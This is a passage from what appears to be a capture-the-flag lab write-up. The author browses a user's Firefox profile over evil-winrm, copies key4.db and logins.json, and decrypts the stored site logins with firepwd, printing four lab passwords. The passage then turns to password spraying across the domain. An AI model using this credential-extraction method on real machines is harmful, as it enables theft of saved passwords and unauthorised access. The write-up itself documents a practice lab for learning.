Firefox
Upon making a lateral movement to the nikk37 user, I went ahead and check the home directory
*evil-winrm* ps c:\Users\nikk37\AppData> ls Local ; ls LocalLow ; ls Roaming
directory: C:\Users\nikk37\AppData\Local
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2018 12:19 AM Microsoft
d----- 2/22/2022 2:40 AM Mozilla
d----- 11/14/2023 1:53 PM Temp
d----- 2/22/2022 2:42 AM VirtualStore
directory: C:\Users\nikk37\AppData\LocalLow
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/22/2022 2:42 AM Microsoft
d----- 2/22/2022 2:42 AM Mozilla
directory: C:\Users\nikk37\AppData\Roaming
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/22/2022 2:40 AM Microsoft
d----- 2/22/2022 2:40 AM MozillaTo my surprise, there are directories of Mozilla, suggesting that the user has opened Firefox sessions.
While the installation of Firefox has been confirmed in the earlier stage, there wasn’t any none default configuration that I could make use of in the installation directory.
Additionally, the yoshihide account never had a home directory as it is a “service” account to run the web application
*evil-winrm* ps c:\Users\nikk37\AppData> ls Roaming\Mozilla
directory: C:\Users\nikk37\AppData\Roaming\Mozilla
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:40 AM Extensions
d----- 2/22/2022 2:40 AM Firefox
*evil-winrm* ps c:\Users\nikk37\AppDals Roaming\Mozilla\Firefox
directory: C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:40 AM Crash Reports
d----- 2/22/2022 2:40 AM Pending Pings
d----- 2/22/2022 2:40 AM Profiles
-a---- 2/22/2022 2:40 AM 75 installs.ini
-a---- 2/22/2022 2:40 AM 305 profiles.ini
*evil-winrm* ps c:\Users\nikk37\AppData> ls Roaming\Mozilla\Firefox\Profiles
directory: C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:40 AM 5rwivk2l.default
d----- 2/22/2022 2:42 AM br53rxeg.default-releaseThere is the Firefox directory and I can also see the profiles.
The presence of Firefox profile confirms the theory that the nikk37 user has used Firefox.
By default, Firefox profiles get generated upon opening a Firefox browser
additionally, if the nikk37 user has ever used firefox to authenticate online, those credentials can be extracted
firepwd
While there are many tools to go about this, I will be using Firepwd
Credential Extraction
*evil-winrm* ps c:\Users\nikk37\AppData> cd Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release
*evil-winrm* ps c:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> ls
directory: C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:40 AM bookmarkbackups
d----- 2/22/2022 2:40 AM browser-extension-data
d----- 2/22/2022 2:41 AM crashes
d----- 2/22/2022 2:42 AM datareporting
d----- 2/22/2022 2:40 AM minidumps
d----- 2/22/2022 2:42 AM saved-telemetry-pings
d----- 2/22/2022 2:40 AM security_state
d----- 2/22/2022 2:42 AM sessionstore-backups
d----- 2/22/2022 2:40 AM storage
-a---- 2/22/2022 2:40 AM 24 addons.json
-a---- 2/22/2022 2:42 AM 5189 addonStartup.json.lz4
-a---- 2/22/2022 2:42 AM 310 AlternateServices.txt
-a---- 2/22/2022 2:41 AM 229376 cert9.db
-a---- 2/22/2022 2:40 AM 208 compatibility.ini
-a---- 2/22/2022 2:40 AM 939 containers.json
-a---- 2/22/2022 2:40 AM 229376 content-prefs.sqlite
-a---- 2/22/2022 2:40 AM 98304 cookies.sqlite
-a---- 2/22/2022 2:40 AM 1081 extension-preferences.json
-a---- 2/22/2022 2:40 AM 43726 extensions.json
-a---- 2/22/2022 2:42 AM 5242880 favicons.sqlite
-a---- 2/22/2022 2:41 AM 262144 formhistory.sqlite
-a---- 2/22/2022 2:40 AM 778 handlers.json
-a---- 2/22/2022 2:40 AM 294912 key4.db
-a---- 2/22/2022 2:41 AM 1593 logins-backup.json
-a---- 2/22/2022 2:41 AM 2081 logins.json
-a---- 2/22/2022 2:42 AM 0 parent.lock
-a---- 2/22/2022 2:42 AM 98304 permissions.sqlite
-a---- 2/22/2022 2:40 AM 506 pkcs11.txt
-a---- 2/22/2022 2:42 AM 5242880 places.sqlite
-a---- 2/22/2022 2:42 AM 8040 prefs.js
-a---- 2/22/2022 2:42 AM 180 search.json.mozlz4
-a---- 2/22/2022 2:42 AM 288 sessionCheckpoints.json
-a---- 2/22/2022 2:42 AM 1853 sessionstore.jsonlz4
-a---- 2/22/2022 2:40 AM 18 shield-preference-experiments.json
-a---- 2/22/2022 2:42 AM 611 SiteSecurityServiceState.txt
-a---- 2/22/2022 2:42 AM 4096 storage.sqlite
-a---- 2/22/2022 2:40 AM 50 times.json
-a---- 2/22/2022 2:40 AM 98304 webappsstore.sqlite
-a---- 2/22/2022 2:42 AM 141 xulstore.jsonWhile there are a lot going on within the profile directory, All I need is key4.db and logins.json file
Those 2 files are responsible for storing encrypted credentials
I will be using the built-in download function of evil-winrm to transfer those files to Kali
Decryption
┌──(kali㉿kali)-[~/…/htb/labs/streamio/firefox]
└─$ python3 firepwd.py -d .
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
}
}
}
OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
}
}
}
OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
}
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'While 4 credentials are successfully decrypted, presence of the website, https://slack.streamio.htb, suggests another possible virtual host or sub-domain
Nevertheless, these are the 4 decrypted credentials;
admin:JDg0dd1s@d0p3cr3@t0rnikk37:n1kk1sd0p3t00:)yoshihide:paddpadd@12JDgodd:password@12
The provided credentials exhibit variation, yet the potential for password reuse cannot be ruled out. To assess this hypothesis, a domain-wide brute-force attack will be executed. Successful validation of the credentials through this test would confirm the presence of password reuse.
Moving on to the Lateral Movement phase